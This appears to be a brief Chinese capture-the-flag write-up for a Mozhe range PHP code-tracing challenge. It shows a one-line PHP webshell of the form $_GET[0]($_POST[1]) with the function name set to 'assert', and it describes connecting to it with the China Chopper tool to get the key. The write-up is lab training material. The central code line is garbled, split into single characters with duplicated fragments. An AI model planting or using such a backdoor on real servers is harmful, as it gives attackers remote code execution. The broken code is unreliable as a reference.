靶场地址:
https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe
根据题意
访问页面
在线跑出
整理下代码是这样的
G
E
T
[
0
]
(
_GET[0](
GET[0](_POST[1]);
和一句话的$_POST[1]传参差不多了, $_GET[0]就是我们的函数名了
构造一句话木马,将“0”当成参数,赋值为“assert”
使用菜刀工具连接,获取key
PHP代码分析溯源(第1题)
最新推荐文章于 2023-07-21 20:36:40 发布